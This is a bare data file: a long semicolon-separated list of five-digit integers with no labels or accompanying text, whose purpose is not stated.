23539;10634;20950;30474;36788;39334;57015;39689;42699;57483;35986;63325;16940;42529;57410;60813;37178;11501;65380;66140;42041;54403;16618;18097;63660;49896;26573;28472;25889;56411;14378;51994;56553;33066;47628;15627;49173;63334;32142;58015;26649;48271;10708;61956;17974;40784;59509;33662;51948;58378;64423;40125;23795;12379;62905;33791;21801;50456;19855;41112;24981;11445;13166;29090;49074;66555;48362;11214;62831;65352;61129;52220;42945;56752;65692;31451;56389;64324;44318;18999;43413;46954;24820;11886;49281;41883;15847;47809;44963;40384;27886;43912;33457;27455;45666;28274;40525;44379;39736;26611;42898;66428;43955;19257;53053;50952;19045;17299;31400;50341;62560;14943;26109;63165;34332;34291;38864;13325;48646;62373;30931;50047;54270;25175;34725;42827;10247;48879;33131;63772;45002;45489;44499;23725;12484;21719;40836;21665;28036;38411;61969;54488;25872;46445;21514;18124;18243;14763;61729;14144;47245;29659;65263;13318;52296;20787;54360;49197;45842;17184;59934;33661;60363;46334;47751;51503;36599;47485;16762;14760;30187;33182;61479;48194;51697;42946;40231;44774;60146;61391;44406;34141;51543;62018;58402;63235;36528;43459;41178;51015;10522;29720;25283;53523;66644;25863;20676;47352;53205;49594;19762;20773;56017;59813;29281;15667;42715;42083;65964;23387;38539;33513;24835;30163;32799;59351;35653;55240;31401;40481;65528;42720;34553;52744;44433;42950;36314;33147;65940;17677;37439;16160;27895;52136;43056;58190;34774;54061;42895;41852;35330;18637;46915;10903;27555;28761;19334;53050;32706;39793;12447;24239;60004;11104;13146;45836;57970;20783;35748;65379;35811;48750;38408;51764;30477;40395;21780;48187;11046;58117;49959;45861;39435;48800;20792;38495;65182;51896;33080;19236;40900;53074;28694;47763;39299;54450;34679;20132;56545;22779;56808;43727;14980;64210;19014;53593;28823;66794;17693;64489;16288;55145;59789;63242;57712;27940;64902;15476;37568;31492;28591;32061;34020;23286;63839;51138;42696;26010;50863;13688;28678;14482;28616;13145;21683;31019;28827;35011;49274;57064;59982;20174;54949;49596;65511;15478;44388;35708;10604;45090;22411;19823;20720;28068;57608;20019;49788;63507;49512;54394;12940;42228;53967;58455;65038;45508;15324;32880;59030;48292;22141;34478;61857;55620;23083;52305;43676;60932;11451;45083;21713;37101;23007;36732;37237;14923;43968;49852;49925;66885;14404;11546;48890;33240;32598;34820;60596;20099;52371;21923;35642;61360;40458;63959;21670;13986;33106;66496;33591;51977;56456;52607;50790;10971;57849;48576;37977;23355;49564;64311;63193;18244;34225;17353;37173;57570;29755;33710;44445;54047;61093;56902;63863;54183;45467;22913;35442;51563;52110;15913;15003;19627;38313;60147;65631;22272;25947;14131;53733;18448;33422;39742;44850;47219;28306;33636;44226;50618;41694;50914;40265;29376;20083;44257;42690;17728;11530;59647;27577;21212;60665;33286;34889;14058;19830;47640;52183;24594;62265;34130;20195;22656;55134;30215;48596;21210;49591;54299;13351;61381;35823;40881;57803;32566;57032;37882;13423;62615;41558;44748;13472;29743;42001;44790;34884;25558;43826;36915;63391;20592;40661;55798;10341;51950;40487;55802;33949;37537;26823;14785;62614;42553;24394;49365;24524;21728;56209;65228;40664;63200;46078;36711;15757;24383;50722;32923;49389;27484;48552;36100;43724;64945;24891;55593;52438;14503;18548;59367;16564;17125;66387;23708;11468;51987;13609;53899;19444;46959;61722;61761;49516;27066;11094;53662;29783;33012;21505;52011;59114;56686;11497;10485;55741;19539;24293;11192;49667;16479;51143;57044;38399;54900;63852;53868;10082;64595;49373;65074;56288;26859;29411;43582;64878;64988;21215;49599;17289;12978;51142;24049;32612;45639;36658;54206;53449;23249;46045;51102;50574;65323;31204;34618;51196;15709;37102;34480;10719;12523;23277;54196;30469;61447;24890;18119;44969;20112;30170;49336;25626;25571;15370;40777;35426;66865;23068;20741;21049;30077;24226;48709;21547;10379;34778;11057;54482;14162;21312;45412;24550;61116;18171;40196;54734;61997;12465;36577;30904;63158;63554;24520;42580;14903;12463;20405;12696;54098;30116;33327;50765;61350;57279;62017;33020;62070;43120;46794;21471;40868;13940;51845;20525;31112;64524;49567;54150;43146;48243;55725;50695;35174;62869;23861;50691;26660;49989;23598;20688;10408;24276;51268;64005;26844;37129;31777;42885;24526;62037;35243;46595;64898;29683;50520;15923;42003;49148;61951;18384;54725;24998;56217;41292;51695;31472;63238;60135;35191;34300;17099;57965;56653;53930;39005;31008;15530;28615;35129;39424;24025;50591;52368;32276;21027;19052;66420;17239;51315;10839;20986;35649;13133;38230;17271;25593;44767;59476;58589;13787;35053;40490;15151;26191;24877;22834;42649;29485;35670;21417;27470;39830;15736;27937;23315;28882;62249;60220;45616;65701;44222;44897;25244;50679;45345;45848;19055;33287;35845;58121;38235;27806;48833;43836;38973;19210;41590;22724;58438;55398;61179;51099;40859;49138;61639;31349;54427;66417;35475;45844;64470;50356;26930;19335;51541;41576;14246;13465;26216;62411;64780;13923;52326;35439;31517;25774;32904;59851;18360;53208;16210;59468;57023;62471;62846;56835;20915;13494;19869;31172;42122;60165;49811;41536;26838;19722;41117;26556;55956;50706;59676;55174;62980;57107;44944;38267;16241;61288;33843;48764;47621;45818;58305;35738;63722;38530;34932;27449;58871;32916;29780;47898;44119;47295;63364;32701;35589;14134;60718;22587;45243;16209;44050;23429;47202;61430;60472;64929;38913;12198;25535;37941;16347;63717;21736;26653;35144;47263;26967;49433;57149;36989;47318;27668;61619;19480;51907;51374;58984;15608;63073;60448;62958;53594;18889;12421;61714;20104;10458;59439;16327;42307;51682;43998;50669;56781;55519;57473;21342;56466;51361;45884;20967;63384;42741;20017;13945;21013;16948;64658;14707;20320;47148;44130;38701;66584;14313;63882;31276;45979;40870;25505;52925;20455;62041;56410;11954;36181;27339;43196;61263;11838;45735;59454;15810;59206;66397;45860;34189;55197;19778;56353;43085;15373;52547;46885;14915;63880;39254;12541;13291;33993;30565;45621;37028;54862;41609;15969;26172;29316;62581;41086;61233;27026;65164;27025;42707;38367;29888;54288;24197;27224;64500;30492;46214;15551;10356;59752;30888;45781;58511;22924;32000;22251;60648;52545;29911;30510;47818;28089;11201;22250;20605;19569;61780;53248;31468;15377;44655;33137;57096;21992;25233;61809;41915;57359;22696;57766;11483;61751;44557;26971;49862;26850;17688;25541;39999;51684;23510;52354;27573;66912;44340;22921;52762;22407;38603;39081;51936;20797;57405;52293;22839;42770;55922;46875;55117;36655;17446;30950;49259;12843;26007;52145;11023;40167;41817;21213;42011;11767;36635;66141;25579;28336;66551;57298;38025;19558;44151;37476;17618;18545;50777;13901;30030;27301;52485;35678;12281;22264;11328;18513;40138;26881;27498;16781;22205;20807;55767;44120;60477;21164;47652;40175;53942;31086;28329;31826;54836;58940;66113;37595;15645;22313;54007;51449;21406;64954;52533;11532;16778;14675;63991;13114;11648;17610;61392;62003;66403;12892;55840;65383;42028;37162;27878;63011;35035;54705;39768;43973;51939;21751;63243;35727;16617;62672;12903;62600;38291;54767;42728;36837;15635;10676;53283;53841;20595;18359;63216;44293;40591;24666;57572;17209;33619;56418;56602;36195;32581;47357;56452;61009;12454;46775;18265;27889;56457;21824;20403;48628;45678;14054;55734;66050;10123;62173;11325;43432;55957;59689;46103;23280;33475;45888;43620;48627;36531;32807;41416;23019;66448;48855;14060;11802;44367;62591;57381;18533;19861;41511;24398;11059;65112;39390;48712;52161;48791;63103;49673;38211;56383;45949;53516;40951;52894;18288;58332;19424;51205;12954;23183;16517;29092;13832;61847;38252;46442;20599;63950;57681;15568;56739;58656;37691;36534;37834;39273;34191;19511;51575;30280;30305;16360;23987;48657;18157;14097;50835;11749;49539;65018;50416;33778;18006;41380;50696;57216;65214;48159;12810;41049;29230;31732;54784;39249;19867;54042;43950;20325;53675;18819;44472;31024;23556;39061;48868;51082;25901;44461;65474;40986;20291;54786;46132;64461;46548;59763;31257;23752;14697;54544;48410;54794;51158;31567;28309;56534;55832;50057;20435;34585;54570;16732;18777;44385;19534;34067;30213;37376;58669;66082;22723;60307;58719;46108;45958;24799;19800;47500;34676;11884;14728;13302;38786;19051;63945;20450;10814;63102;39701;27245;52780;16608;27402;13171;41529;13659;29999;49787;15606;21487;51197;64065;60879;25412;52922;57278;64195;47188;35555;38647;37634;39739;36598;55111;16295;50087;15828;32347;20999;33059;19281;66202;25874;21301;26086;62502;24342;17249;28532;34995;52090;37743;60916;41697;66377;17664;53811;60998;45337;65588;18896;25736;55735;24700;39924;30766;66602;29525;52243;36748;31751;55950;39326;16468;46217;53991;44456;37670;18112;62866;13006;40603;26589;28750;37714;47421;56903;15892;32651;19262;23213;54589;31381;19160;36755;11795;50488;61361;44302;63269;47065;16682;18836;52439;63850;30621;66466;20528;55058;33981;61828;24589;12257;58323;11772;60798;42067;11877;44872;13555;65115;61646;41651;58876;57730;57338;48626;38316;35346;57663;12628;31062;59780;53765;56519;26020;24434;50507;59051;32475;50555;45541;65785;30274;62103;59169;43797;52313;22086;40630;36458;64196;52014;20789;62949;36829;31705;22308;57916;22579;66698;26973;45522;43460;35277;36735;15536;55241;19860;25222;58824;17348;12279;48941;61214;30127;63649;22118;28487;48841;51406;50434;53605;44576;24074;66623;11938;22074;66501;31932;36014;38082;42224;65995;41027;39513;64919;36417;59217;20051;59175;20523;55105;44008;48772;65072;64689;31312;33512;27607;54499;10638;51049;58705;20665;44005;63420;14243;21063;47170;48386;38950;22934;65814;37079;25613;36882;19416;35003;37336;24930;32471;14545;22198;54015;64906;29487;59445;14130;34592;31925;50189;21207;57260;19364;33323;47707;14438;41254;40307;62040;66616;52970;49431;51557;34502;59913;12467;55200;39952;26006;18486;38216;60612;61535;49370;16695;15306;29649;45126;57972;22371;28692;57041;26676;51313;11039;15353;59264;46202;36349;12915;65753;34003;63220;18678;14023;58456;45235;16494;22037;16614;28323;32788;45430;53152;58545;55641;40807;31457;16834;29982;17037;19367;38486;64626;17129;54238;39568;30638;34650;46720;66320;34657;35343;42361;33522;40889;50754;62356;52292;27446;12806;19077;29515;28799;54431;46781;62421;32857;11620;30886;27240;57237;37483;62066;32114;22013;29973;51748;60584;28289;53365;24019;59546;31587;13527;59040;61982;62349;51657;52662;39028;33351;26962;36746;45609;43087;63129;16796;34315;35203;12423;28261;25959;56564;43358;41363;56324;35445;42936;29910;63231;65250;24638;12571;34135;52803;14035;51397;27929;56228;15550;51899;28905;58144;58854;26855;60509;27669;59578;52815;18708;18841;54446;58516;14256;38844;56703;66252;29016;35905;32445;35586;60166;27741;56378;62601;25295;20862;45416;44161;16194;23426;10087;65529;26820;50860;13819;55325;59462;36316;27756;61451;26039;15916;62298;53932;29905;51165;41409;41601;32486;33184;41006;24107;11910;45454;29842;25765;21629;45962;26784;63855;39304;28422;50258;52704;62514;64468;27451;62174;19655;60126;50092;17157;10051;56710;40638;59901;63061;42880;30377;15172;30739;49231;49436;22876;27422;14583;62730;27257;66260;40864;54923;35807;52232;53418;26418;37232;49714;32110;47892;21678;23929;45868;19683;51331;41038;29902;50575;52430;10035;66956;29817;35021;59100;15885;31162;56113;51892;66811;61523;27898;46117;42219;63723;17657;21293;24766;21319;56719;32505;46618;36116;56485;27049;62024;37928;16273;22938;60331;64047;44137;61676;27261;11473;62816;43327;52551;43831;26593;66304;35979;43356;53483;54936;34686;14232;27418;29977;28974;36412;16521;13266;58582;37475;64522;35181;15846;15117;38156;50996;20028;53794;38510;12043;65065;56977;63929;53526;23538;19197;30250;54566;48366;14025;15317;50598;59070;45308;32207;54162;36477;12440;34492;40082;60759;35891;56642;29297;56640;49772;32802;21995;25895;29736;19923;34516;23934;17695;45159;43350;30143;19235;12060;52758;18041;53162;17646;19856;38562;57262;15170;60515;16427;19290;43323;21613;41394;51639;46229;46041;29847;43131;30647;41435;10089;56301;44941;48550;26980;21903;29081;14589;22879;11430;24462;63761;43668;32369;14582;25977;30525;29304;52366;57830;13440;44823;17240;33464;45229;63479;48520;42962;29958;51638;57038;26836;54461;40297;58156;39604;55768;59197;25477;45783;35409;16267;46106;38341;19466;25353;61710;66960;46272;16136;19527;13068;59043;58509;25906;51877;23074;53438;31426;31367;43075;60047;53555;21014;42798;47290;28242;26993;26738;37437;12694;17380;20064;22825;54142;15456;52772;30970;59009;19820;58573;53954;18204;55603;38416;52729;40160;25428;28982;19448;35805;61219;61282;66279;63900;27802;64616;47458;58500;53196;40711;16343;27684;38226;28706;34201;18328;23574;14327;30226;41807;59225;58143;44466;14487;35747;59112;27836;21880;52975;17763;37385;23472;13117;27633;20850;20442;33796;49950;47232;54643;54245;16303;34613;58346;34216;60366;53751;64677;64779;21133;27291;57833;36178;18143;44485;18480;56972;32824;27217;65440;48188;32783;31412;46983;25326;31145;66308;52558;20173;62736;21893;60801;54289;52555;13456;19019;30520;36213;62898;48882;23591;51757;11403;17705;29906;49371;55942;56733;23910;11509;20454;17971;45076;26223;40453;35255;52216;65662;49183;16183;17662;25475;18584;19971;46477;12397;14027;20559;36279;16216;54027;46498;59246;58749;23873;40174;50619;24032;18094;54773;48713;34002;30057;26080;53319;66800;65270;43885;59554;53749;45924;15174;50053;59668;22030;40917;66122;51767;27510;23486;37462;50035;56210;22379;40601;58487;14608;12797;14613;55124;44249;35770;39704;65578;16278;59516;55416;52694;12272;44271;39315;11289;56563;61682;43064;49528;59302;61903;23540;51172;35702;65989;17760;60949;34304;24470;50225;29811;66311;46874;21009;34907;32069;59634;42203;40218;54050;30813;42091;46927;54078;57494;63347;47225;40759;14740;42811;21447;43540;66399;19553;28875;32617;41799;12404;51857;29944;59993;53397;26677;23638;61450;56970;16229;19106;54500;36009;63503;44019;60185;35676;41966;17391;38480;20122;60652;41742;61855;13632;32511;39466;41246;16667;24647;43642;55284;36838;33688;34594;43347;38893;53352;40362;50321;51444;25747;51681;42229;13994;23040;10347;20948;46149;30251;61055;52856;59795;10810;16628;65413;65793;24734;41016;32574;11197;22759;11632;20715;29784;19960;61077;58903;20328;30303;29831;52025;10382;25141;15785;28132;62727;57768;57230;16919;54787;27282;11793;52624;40113;12596;66095;19102;65581;25100;38004;63718;17329;60380;42845;14139;10507;37792;62244;39050;63611;59281;57255;64650;60886;65419;45706;14937;44070;20929;21554;56112;16816;30081;58536;34358;13642;38040;13189;60706;24669;55350;33002;55442;12887;64261;15552;59713;55788;52665;11762;55383;35209;50469;59334;21882;14768;35913;51520;58538;24282;27074;53673;33403;36978;48753;17605;47634;11243;35733;50593;12747;39823;53263;13344;63068;56264;15938;12838;53988;12370;66671;44442;41748;20982;37035;11184;12278;28053;38454;17399;59999;44085;61557;46826;47101;43772;65744;26139;37593;23699;16191;35460;64343;43496;44054;57604;37341;46291;57655;44334;20859;48305;47587;56265;15776;51498;63106;14224;27894;56496;62453;21630;63444;28014;15703;56615;52631;57488;44970;35308;30549;25992;43663;32296;56154;15724;20672;55863;48686;35817;64766;12724;15948;59645;63628;52614;14831;38232;29280;21786;61412;40069;63846;45043;45925;17835;14435;13357;10386;18717;15959;65021;44195;10829;36881;40643;49813;55151;44262;44568;10771;45729;22260;42076;43452;32291;31890;63842;47281;50870;34450;15185;46403;35721;62162;35658;38705;25826;55612;52178;40142;21426;17373;20466;62918;27477;35251;35684;23865;47168;26950;43562;37301;59896;21488;12449;22748;20821;20221;55563;61878;25048;54340;48866;66475;59861;13277;14654;22577;22607;32899;15745;66593;53845;42280;44854;19942;64915;14603;62343;50832;12995;27963;54154;17140;62416;60108;21902;57395;20422;14192;52276;25331;23383;13238;36282;23305;55394;49522;42526;45292;18037;30614;55061;54990;19684;36752;45512;32528;21485;17280;11114;21612;33156;18451;14110;49781;19115;27795;64643;42685;34760;45801;39901;52214;21046;24396;62733;28559;41187;22692;14396;16032;62200;34581;11043;19522;35441;62278;24684;64213;18652;42429;39485;42055;29325;28814;19491;21732;24639;54984;19580;52336;15548;17016;53346;65378;52369;10435;32431;48623;11007;48566;63188;44348;37314;19103;57949;24522;38508;27008;62927;57212;60504;54459;18363;48532;43000;10945;25350;42834;51101;66298;47870;28813;11355;31535;46480;32949;54164;55560;35883;27822;62971;26885;34915;37602;55824;61078;45053;28821;52859;54167;36338;30513;52974;10411;14508;29018;36571;66902;30225;38937;66099;62919;63132;39105;37047;50727;47117;15148;55673;36336;18460;43709;35352;65109;24449;64891;63711;54899;60673;20832;66323;31543;30909;27514;36048;52731;24697;43475;31185;61410;16584;64558;53217;65492;45883;51048;30404;25338;59849;34166;26308;31600;60728;61944;46789;39378;10572;56020;37360;27981;51986;15111;49838;62986;40846;35052;58611;21484;47393;62436;44394;48952;45727;65122;18321;57883;54422;53807;12808;28419;21043;57007;16961;14742;31009;19696;60558;62742;22612;15233;12975;11652;41224;22554;21955;59185;46844;60548;34410;27721;42461;38498;29354;58827;13370;36408;59991;23409;42340;58212;56619;44893;35250;13758;50109;35223;36385;47326;42331;50910;16588;45903;65612;40860;56307;28279;11000;36894;18376;39084;16900;16966;50344;20813;54463;23144;40719;25264;16861;13751;38668;18115;57628;19430;24367;17127;56579;55580;24212;58253;28634;52257;66592;19419;35057;41823;42325;45538;60194;26189;48870;35760;63270;47719;40751;11398;47481;32020;66257;52918;45327;11788;44692;28445;19693;18661;15435;59734;54792;29183;33531;30978;29558;52976;23076;28689;12658;12380;49310;17543;60956;54017;16814;63283;40716;66867;30457;35340;19692;25857;27267;63135;17711;43250;12614;22742;36854;14373;60454;46805;50548;63346;16820;31584;26841;45669;36333;40137;48606;30218;30911;54281;64694;38286;22214;26716;44835;44203;20273;28008;22615;62526;19487;65899;50604;36151;32249;46188;64869;33014;55868;32628;56514;66048;48318;64138;18809;14868;57578;52271;23313;17661;57533;51438;15099;64879;22690;55611;13457;55153;24746;66590;64806;53745;19872;14819;15052;19540;22902;40429;57624;55968;31244;43371;42604;21098;16342;43408;35508;15211;13205;58933;16417;11024;64438;42301;14086;19404;19164;53912;30719;37516;40748;20369;41604;33555;53509;53949;66310;38132;30752;45193;46583;18613;56628;38666;34667;42054;65571;23052;62804;61066;57674;44324;36047;19647;34887;30151;13567;23541;50373;55452;40158;27757;35937;37495;31955;27115;13860;36560;61581;28677;27176;13975;10249;61452;26198;59033;36215;35476;11041;21794;33107;48921;40249;41025;33862;56899;23798;31531;36272;11264;29852;34545;54389;13414;64972;61949;21537;58061;56955;65333;25500;16149;12665;36066;66235;32631;15853;20236;52984;53161;20238;16566;50001;21289;12555;41847;55839;19523;40141;22757;18361;30863;57160;41093;60323;63236;60511;11565;63767;37371;64811;30784;27525;35694;66840;13348;25730;32549;32556;16754;21230;48739;31902;15017;37274;14047;40895;50153;16736;46882;18140;43851;62077;58277;10387;26092;18520;51056;34170;28483;38532;12402;44668;15217;18053;47390;16097;40812;60905;56765;52289;53336;35616;33214;16350;54693;36669;38726;31820;41524;51726;44996;59471;32761;62233;36305;36415;17672;62002;48409;39945;65262;44350;53931;46200;62594;26169;21313;50074;33998;23676;58056;23593;46027;15747;52522;53627;43564;19850;57115;25834;62557;21109;17766;17107;30862;45326;60593;23681;11137;19628;55507;35205;35959;14807;33480;23015;58467;29153;52986;40960;39613;38274;53681;56541;19365;46073;55469;34652;29104;40902;57443;41527;20930;13343;39019;66524;39147;29593;17687;62352;54385;44524;22780;46631;28100;51714;41981;64199;39957;28721;35744;34991;26766;20879;32413;25943;25692;40001;28951;31290;28944;62787;40066;40016;48541;62607;42820;59954;30026;22155;31339;27961;37337;53667;31572;29667;63162;37355;62913;63408;43945;39306;21458;64319;26547;12526;45255;13003;31919;42385;24246;63999;26704;25248;22563;26726;66526;59922;64321;14284;20026;51546;47819;65491;43835;65147;55401;56978;48157;25813;55974;10794;28401;60184;14011;17638;16206;63142;21029;60231;18079;50503;43343;17561;33391;30082;37863;30546;50027;29353;10711;64857;15827;15869;66504;47198;21917;14195;23379;46461;15057;16902;23271;53784;31847;64914;50066;29404;16525;45276;56313;13336;37814;63501;13640;48914;65776;56304;21759;47333;39563;33732;28402;48947;12318;11415;12886;54607;44991;28127;48389;61871;44052;44537;40217;54619;35715;51493;35333;60439;34442;31253;51162;49715;13188;41485;64535;28906;46630;22669;35318;56259;42282;37176;30219;33904;61890;21963;13960;50898;31382;17746;17372;61396;17120;37856;63268;30562;54944;25670;65349;37304;49916;44775;45373;61072;66108;49021;50621;16125;36046;24762;29802;41933;17161;48745;66486;34703;44646;13729;51263;19736;41978;38292;52184;21415;26394;52058;31200;66456;12522;46154;41061;24585;58197;20334;13218;17313;46610;16824;33568;30131;33817;42582;27192;39824;53992;57996;40586;62096;51871;49017;44607;35208;40483;25032;21758;10419;48818;49939;52087;53670;12776;64333;41122;14214;34797;49739;34513;32407;66695;42713;32364;61698;15940;50851;57125;36926;32177;12733;41347;26791;49195;65918;31683;40752;53574;59858;40808;52104;17525;56744;11402;61525;60245;15262;52698;59392;15166;44477;28331;30569;33788;57453;10096;18398;57245;41432;60685;47160;12916;60517;13909;20115;50608;50497;15405;12269;53823;17087;13743;21550;35981;31061;55475;28427;19213;40165;14738;45114;37111;56144;19821;61806;36242;18372;22731;24325;34631;36207;37084;13880;63743;31737;25980;38833;15421;32650;36386;45933;64387;22497;21994;42131;26268;43986;66104;41352;55892;62972;62308;47443;20724;31972;57722;25259;16442;23544;24623;63079;51492;17692;19922;22091;34967;10657;18146;59214;50892;18383;16753;10001;64783;59903;12741;38186;24051;22730;37597;65131;51068;22157;35749;62109;58275;56163;54039;56078;28320;18055;58728;23655;52036;12466;19432;48597;27318;37220;44782;24932;34394;40502;52388;66733;53285;53453;29574;51167;10227;46460;56202;40331;16253;11084;13672;54986;44828;21823;60027;62425;16300;30645;26847;58729;35714;59137;31515;46261;11226;47820;21056;15875;25330;45192;51521;52715;58293;11035;15442;32294;25129;61632;61608;54639;41513;32088;51800;12796;36106;47132;51771;24106;34737;54966;13646;34126;60076;55342;15566;31321;20473;32112;24610;57650;16145;38648;28712;52222;28504;37907;27609;61238;60219;53741;57632;30177;17408;65774;41787;15930;59786;62832;38491;48190;16406;46371;66822;25524;57666;51096;36957;49427;37228;49248;53118;62558;46392;32329;30115;46776;64796;51461;53445;30620;12946;11381;17798;31810;32343;12052;57990;43806;16083;15445;35931;25314;53934;15900;33032;33767;27370;19646;64592;40529;28169;33445;35962;25756;47123;45473;59096;26795;16812;13545;61702;48929;52378;36797;66327;26664;62361;41757;34702;31672;38214;42900;55999;10471;11774;52868;10114;45115;10149;48714;32633;30259;50763;39849;61358;60971;13989;44387;60622;64962;50151;27880;56370;25450;38663;14323;24769;40686;26088;55431;17807;35784;28622;56242;46591;36550;33738;62292;25880;54830;46054;53616;39124;57046;44766;40406;36123;19829;43993;26875;59949;13163;43976;50268;15584;42648;32806;39336;38361;65747;11696;35075;16965;65267;27186;36539;54044;20382;18179;41561;22274;65421;59176;21195;61321;30711;30440;39492;35930;52548;56325;61592;16497;37842;42852;52754;56477;19583;29535;66463;33402;30554;48254;53304;44896;11113;57063;35941;13984;39049;23380;46088;61719;54945;52332;32076;46821;35778;23443;28392;46677;19386;20643;16111;22637;19853;46495;35297;22917;57553;16355;50459;38882;42253;50534;22907;14959;13094;31509;41760;36595;38830;56939;66253;28202;12629;25822;19393;25984;34139;47491;58123;25502;34374;20292;46654;53680;56911;22259;53261;16067;56826;25617;34733;55575;60270;59515;41382;16133;42836;44225;47791;53134;34417;39612;36376;56555;58496;55524;28318;46995;46066;16648;32358;55295;32245;21866;44966;32827;66936;13047;33667;30788;33749;19643;11807;19174;44493;29152;59317;57525;49678;24163;54805;49761;46193;51353;50820;24456;41200;11538;57474;63433;23166;62579;23791;55842;16916;50402;41848;24545;24885;62642;34649;17597;41417;62212;65468;11504;11573;37689;56262;18052;30400;10368;21089;16578;19067;12029;31419;14481;65527;52066;22496;23585;10884;65892;56690;24650;49460;23047;52155;64729;10042;45167;15464;30350;33753;20944;55763;24404;25715;31347;37640;45731;41474;55943;50208;18117;52529;65672;52587;12755;63232;54719;42632;31493;49249;39954;25337;26458;19832;37972;66112;41676;10157;35216;35221;10349;58919;48664;45954;12918;26765;44954;56060;36179;11014;25012;33039;50880;27048;16922;49501;31105;46831;44989;28418;39874;65174;11012;28475;61369;38662;31074;34250;41373;62135;54921;62650;64337;62231;41333;41075;50676;63509;30351;10767;49025;60444;57413;62344;55471;37248;66974;36569;36084;32730;30518;33097;59511;55816;10062;13601;41818;43536;21059;60666;66213;20766;15437;28629;61334;10803;44165;19675;53006;19935;52627;18070;13559;49032;35393;18156;38850;10132;37755;64701;19427;45146;57719;61149;15910;49462;42617;38351;13233;33049;20335;14767;55301;48149;37746;52055;15610;63978;60912;51000;60073;36754;10950;58747;38853;53569;16950;17098;30763;58302;39108;11780;49542;22107;23592;16152;10785;57280;15315;29685;46756;62288;17641;49027;55728;30392;44721;10631;37974;17795;43117;16166;17769;22445;47328;55254;60982;21774;44849;35123;29556;46418;18853;57920;51008;47665;60991;66844;21413;22120;61861;42436;48783;20660;48849;63790;29799;57653;64429;49072;16958;35735;29881;15272;66314;63094;12556;44787;53121;52267;47030;59587;42808;23167;18989;63654;40337;63875;50990;35260;57291;23893;38019;58266;27893;53961;51398;56656;56034;42812;35329;44158;14529;29047;54701;58425;27734;49804;42821;28834;65691;25371;20987;58913;16528;54176;45672;17006;57747;41917;12494;33783;62335;55633;18418;52139;28839;29886;23995;27231;33229;14459;55561;10129;16435;63160;46346;62203;18065;10080;28037;38369;31755;27499;34841;21148;34589;51207;16382;52747;54121;63361;53566;53192;40380;17255;44886;31117;43285;63113;53378;19648;51553;19566;14922;36722;11102;60034;39602;20808;29794;60443;41792;41331;23384;21619;59156;46766;18445;46646;24062;23957;53412;32165;52247;51565;55144;50882;47545;55222;32585;32352;65339;26770;58862;60935;18245;57736;55515;46199;12896;47314;41289;37983;20068;49844;24582;31941;26821;32374;38360;45793;17015;66212;38089;53691;56584;49530;24531;44068;20063;42555;51284;60290;56772;60387;52620;15494;26409;57945;57373;51539;38969;10167;58849;42287;27868;22981;14115;32447;29387;65649;16352;59412;29919;44145;39899;15344;63267;41451;37964;43322;16784;46928;47118;59969;34488;65513;63280;30668;57906;39004;57418;47742;38026;40394;40659;10731;64412;61756;22543;64347;59821;59703;48491;59994;30571;53552;36339;28194;47268;39475;44530;56585;33693;52380;59998;45066;20714;62664;19193;22559;53830;46588;29602;52375;17586;63691;25409;21503;38271;57204;61606;11208;65780;54400;46944;66621;48303;45127;36770;65595;34875;16609;12908;28983;22068;61792;12764;64477;29814;30171;47854;13040;16129;51439;50350;24221;31311;65445;16819;59347;66312;61797;58674;26947;52447;47126;59127;16498;57727;53499;49767;66265;22153;52730;43694;36497;22586;49194;28000;14381;55142;17231;40847;61738;45060;35677;46143;38317;31861;50342;38553;47425;53328;28873;31439;12411;43638;39229;30384;42680;27134;16239;59415;61757;48226;46727;49307;63982;22294;35792;60356;15820;45911;10308;48946;11217;24484;64366;59044;59398;64685;50292;40619;14880;56981;65501;31387;10888;49395;65884;42387;27039;42943;46355;39673;65534;24225;60046;27565;56435;14981;10039;36315;38169;64835;66775;55022;57341;62695;39556;61773;11824;35668;33966;40890;55007;47691;65392;18739;41480;38171;47300;40081;58558;35361;35651;62437;56436;55543;34471;58003;59191;28461;15294;33196;43793;23038;12945;23318;60481;29147;22714;24952;57992;51043;25762;31219;42854;60077;61911;39758;45364;20458;42601;31871;53482;32018;61312;34424;17712;53257;47855;49895;62586;44975;40857;21281;49024;30105;32372;36995;14185;21934;53005;28267;10608;25272;27069;55940;17178;29818;30528;64647;51355;15119;10636;35940;13478;30342;37352;32083;10760;54838;17768;38872;45907;38055;39626;30755;43090;44211;46093;36643;13565;55363;17980;64370;30029;53202;45964;30267;33797;24067;37300;46987;38671;36689;65885;20804;15592;30096;64027;18262;29597;11608;26396;35177;29275;29757;40368;19636;59614;21163;50222;14449;26878;51206;51109;38110;28986;22505;47114;30198;42749;54474;12725;27139;16989;52835;15564;17321;33400;50253;40434;14304;38715;16272;11091;21462;36322;50451;46842;42236;18336;42773;53635;40501;52284;41033;28298;26328;59680;43730;37021;44268;52659;41191;54019;39362;14159;31708;58418;16996;33589;34101;59490;34181;61341;27194;65509;14326;41534;31914;45497;19357;49742;27793;52488;25536;31771;61841;41464;54850;25436;24724;24146;20565;27325;57670;48405;34444;27128;42504;45005;27674;57172;34211;43419;28948;23727;14924;63943;15978;38934;45807;23476;16772;45206;19703;39864;23894;53799;29056;19896;44176;46354;54125;47888;34491;22561;38103;40701;55225;31289;27782;46873;55359;21595;16522;58527;35339;31376;63245;49150;65651;36576;24211;65494;64481;64303;56546;60948;38616;46170;51279;57498;62250;27380;53055;19874;10897;34458;52902;25919;10933;33609;29698;66892;11562;38006;22182;54762;43677;21418;42758;28263;27273;30499;11503;50009;51524;23284;29904;24862;11819;49927;24299;30345;53776;20931;46970;35317;48927;10030;35351;52149;34081;15361;66901;23870;60804;17690;30355;55154;25489;10065;13079;30894;27811;29939;39789;36904;53498;19909;53875;59034;47286;38660;34069;36238;29044;25395;53503;54222;11634;31716;31352;55642;55797;14976;17023;16068;30369;14183;27206;40150;31177;54537;63874;15932;26590;36705;56624;59800;23905;41754;56961;60457;40306;33968;10376;34028;26907;51838;19878;18102;39734;17697;15926;54130;52721;10147;10459;33296;28985;60817;29711;60639;32647;52908;25974;31539;17673;16689;35334;15919;18984;64275;52263;64934;31041;10095;51947;31595;22740;37012;42207;17135;46254;39008;31989;62510;42480;45947;21695;58430;43646;43647;47807;62071;55326;46292;21023;51450;38775;22519;13521;51067;27089;31836;13915;30473;33559;47808;31229;22375;58703;45458;52405;27160;66135;34157;65910;14142;50486;12505;43750;14928;21813;24698;54615;56458;43632;19599;42877;37063;13176;35030;23499;60542;18263;18716;11663;56004;12234;46604;35990;13615;29583;39866;25767;42421;58564;64354;17564;26367;24628;46089;47249;37081;44496;38736;32681;39232;22463;12874;59463;40117;51180;39068;66700;24807;13504;53858;61967;38310;30605;19331;11308;47058;39397;29367;50453;50576;16082;46518;27268;57114;64776;26610;13744;20411;40832;10041;26306;42967;17022;24611;13354;